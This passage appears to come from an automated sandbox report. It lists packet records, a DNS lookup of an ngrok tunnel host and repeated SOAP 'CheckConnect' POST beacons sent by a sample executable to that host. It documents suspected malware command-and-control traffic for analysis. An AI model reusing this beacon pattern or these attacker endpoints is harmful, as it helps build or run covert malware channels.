                                  Feb 17, 2024 20:42:21.286736965 CET17383497403.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:26.310903072 CET4974217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:26.587691069 CET17383497423.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:26.587932110 CET4974217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:26.588409901 CET4974217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:26.865295887 CET17383497423.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:26.865360975 CET17383497423.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:26.865381002 CET17383497423.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:26.865678072 CET4974217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:26.865905046 CET4974217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:27.144587994 CET17383497423.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:27.144650936 CET17383497423.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:31.872966051 CET4974317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:32.146126986 CET17383497433.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:32.146363974 CET4974317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:32.146611929 CET4974317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:32.419807911 CET17383497433.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:32.419871092 CET17383497433.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:32.419908047 CET17383497433.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:32.420025110 CET4974317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:32.420243025 CET4974317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:32.692466974 CET17383497433.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:32.692518950 CET17383497433.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:37.435472965 CET4974417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:37.715094090 CET17383497443.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:37.715399981 CET4974417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:37.716052055 CET4974417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:37.994910002 CET17383497443.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:37.994970083 CET17383497443.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:37.994997978 CET17383497443.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:37.997251987 CET4974517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:38.276055098 CET17383497453.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:38.276313066 CET4974517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:38.276479006 CET4974517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:38.554795027 CET17383497453.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:38.554833889 CET17383497453.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:38.554867983 CET17383497453.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:43.562434912 CET4974617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:43.835509062 CET17383497463.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:43.836189985 CET4974617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:43.836918116 CET4974617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:44.109375954 CET17383497463.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:44.109451056 CET17383497463.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:44.109539986 CET17383497463.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:44.109817028 CET4974617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:44.109940052 CET4974617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:44.382559061 CET17383497463.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:44.382622957 CET17383497463.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:49.123548031 CET4974717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:49.398596048 CET17383497473.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:49.399146080 CET4974717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:49.401427984 CET4974717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:49.674555063 CET17383497473.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:49.674624920 CET17383497473.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:49.674864054 CET4974717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:49.675272942 CET4974717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:49.676204920 CET17383497473.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:49.949655056 CET17383497473.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:49.949717045 CET17383497473.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:54.686002016 CET4974817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:54.958385944 CET17383497483.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:54.958889961 CET4974817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:54.959295988 CET4974817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:55.231556892 CET17383497483.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:55.231612921 CET17383497483.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:55.231625080 CET17383497483.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:55.233160973 CET4974917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:55.506181002 CET17383497493.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:55.506422997 CET4974917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:55.506906986 CET4974917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:55.780055046 CET17383497493.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:55.780111074 CET17383497493.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:55.780138016 CET17383497493.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:55.780400038 CET4974917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:55.780726910 CET4974917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:56.053250074 CET17383497493.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:56.053297997 CET17383497493.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:00.794926882 CET4975117383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:01.065777063 CET17383497513.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:01.065980911 CET4975117383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:01.066286087 CET4975117383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:01.339160919 CET17383497513.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:01.339219093 CET17383497513.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:01.339241982 CET17383497513.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:01.340784073 CET4975217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:01.614892960 CET17383497523.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:01.615166903 CET4975217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:01.615818977 CET4975217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:01.890714884 CET17383497523.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:01.893192053 CET17383497523.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:01.893249989 CET17383497523.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:06.935445070 CET4975317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:07.214459896 CET17383497533.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:07.214793921 CET4975317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:07.494191885 CET17383497533.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:07.494225025 CET17383497533.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:07.494509935 CET4975317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:08.468148947 CET4975317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:08.468492031 CET4975317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:08.748471975 CET17383497533.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:08.748501062 CET17383497533.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:13.484968901 CET4975417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:13.755852938 CET17383497543.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:13.756177902 CET4975417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:13.756833076 CET4975417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:14.027251005 CET17383497543.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:14.027317047 CET17383497543.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:14.027431965 CET4975417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:14.027812958 CET17383497543.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:14.028069019 CET4975417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:14.298269033 CET17383497543.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:14.299401999 CET17383497543.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:19.047694921 CET4975517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:19.328527927 CET17383497553.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:19.328808069 CET4975517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:19.329188108 CET4975517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:19.610318899 CET17383497553.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:19.610388994 CET17383497553.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:19.610431910 CET17383497553.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:19.612095118 CET4975617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:19.890917063 CET17383497563.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:19.891068935 CET4975617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:19.891447067 CET4975617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:20.171693087 CET17383497563.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:20.171758890 CET17383497563.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:20.171798944 CET17383497563.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:20.171956062 CET4975617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:20.172702074 CET4975617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:20.450563908 CET17383497563.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:20.450958014 CET17383497563.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:25.185410976 CET4975717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:25.458693981 CET17383497573.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:25.458925009 CET4975717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:25.459287882 CET4975717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:25.731739044 CET17383497573.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:25.734400988 CET17383497573.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:25.734436989 CET17383497573.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:25.735761881 CET4975817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:26.006771088 CET17383497583.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:26.007006884 CET4975817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:26.007471085 CET4975817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:26.278208017 CET17383497583.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:26.278904915 CET17383497583.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:26.278933048 CET17383497583.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:31.296818018 CET4975917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:31.574023008 CET17383497593.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:31.574271917 CET4975917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:31.574500084 CET4975917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:31.851898909 CET17383497593.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:31.851927996 CET17383497593.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:31.851941109 CET17383497593.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:31.853226900 CET4976017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:32.125861883 CET17383497603.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:32.126019955 CET4976017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:32.126351118 CET4976017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:32.400147915 CET17383497603.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:32.400167942 CET17383497603.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:32.400180101 CET17383497603.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:32.400357008 CET4976017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:32.400504112 CET4976017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:32.672883987 CET17383497603.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:32.672900915 CET17383497603.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:37.404107094 CET4976117383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:37.680509090 CET17383497613.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:37.680723906 CET4976117383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:37.681013107 CET4976117383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:37.958142996 CET17383497613.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:37.958267927 CET17383497613.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:37.958287954 CET17383497613.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:37.959394932 CET4976217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:38.235636950 CET17383497623.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:38.235759974 CET4976217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:38.236052036 CET4976217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:38.512255907 CET17383497623.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:38.512295008 CET17383497623.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:38.512330055 CET17383497623.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:43.529036999 CET4976317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:43.801767111 CET17383497633.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:43.801990986 CET4976317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:43.802356005 CET4976317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:44.074451923 CET17383497633.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:44.074481964 CET17383497633.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:44.074532032 CET17383497633.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:44.074734926 CET4976317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:44.075125933 CET4976317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:44.347404003 CET17383497633.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:44.347433090 CET17383497633.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:49.093497038 CET4976417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:49.365957022 CET17383497643.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:49.366102934 CET4976417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:49.366439104 CET4976417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:49.638921022 CET17383497643.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:49.639648914 CET17383497643.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:49.639691114 CET17383497643.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:49.641046047 CET4976517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:49.917193890 CET17383497653.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:49.917290926 CET4976517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:49.917583942 CET4976517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:50.193734884 CET17383497653.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:50.193753958 CET17383497653.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:50.193768978 CET17383497653.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:50.193922997 CET4976517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:50.194259882 CET4976517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:50.470133066 CET17383497653.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:50.470490932 CET17383497653.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:55.201044083 CET4976617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:55.475099087 CET17383497663.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:55.475343943 CET4976617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:55.475730896 CET4976617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:55.749507904 CET17383497663.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:55.749536037 CET17383497663.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:55.749552965 CET17383497663.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:55.750691891 CET4976717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:56.023344994 CET17383497673.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:56.023469925 CET4976717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:56.023765087 CET4976717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:56.296001911 CET17383497673.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:56.296030998 CET17383497673.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:56.296050072 CET17383497673.6.115.182192.168.2.4
                                  Feb 17, 2024 20:44:01.311908960 CET4976817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:44:01.582617998 CET17383497683.6.115.182192.168.2.4
                                  Feb 17, 2024 20:44:01.582786083 CET4976817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:44:01.583507061 CET4976817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:44:01.853809118 CET17383497683.6.115.182192.168.2.4
                                  Feb 17, 2024 20:44:01.853853941 CET17383497683.6.115.182192.168.2.4
                                  Feb 17, 2024 20:44:01.853914022 CET4976817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:44:01.854099035 CET17383497683.6.115.182192.168.2.4
                                  Feb 17, 2024 20:44:01.854218960 CET4976817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:44:02.124614000 CET17383497683.6.115.182192.168.2.4
                                  Feb 17, 2024 20:44:02.124789000 CET17383497683.6.115.182192.168.2.4

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Feb 17, 2024 20:42:01.658457994 CET4973953192.168.2.41.1.1.1
                                  Feb 17, 2024 20:42:01.751817942 CET53497391.1.1.1192.168.2.4

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Feb 17, 2024 20:42:01.658457994 CET192.168.2.41.1.1.10x991fStandard query (0)0.tcp.in.ngrok.ioA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Feb 17, 2024 20:42:01.751817942 CET1.1.1.1192.168.2.40x991fNo error (0)0.tcp.in.ngrok.io3.6.115.182A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • 0.tcp.in.ngrok.io:17383

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.4497293.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:02.091609955 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.4497303.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:02.644577026 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.4497313.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:08.229341984 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.4497323.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:08.787210941 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.4497333.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:14.347752094 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.4497343.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:14.897855997 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.4497383.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:20.463119030 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.4497403.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:21.013288975 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.4497423.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:26.588409901 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.4497433.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:32.146611929 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.4497443.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:37.716052055 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.4497453.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:38.276479006 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.4497463.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:43.836918116 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.4497473.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:49.401427984 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.4497483.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:54.959295988 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.4497493.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:55.506906986 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.4497513.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
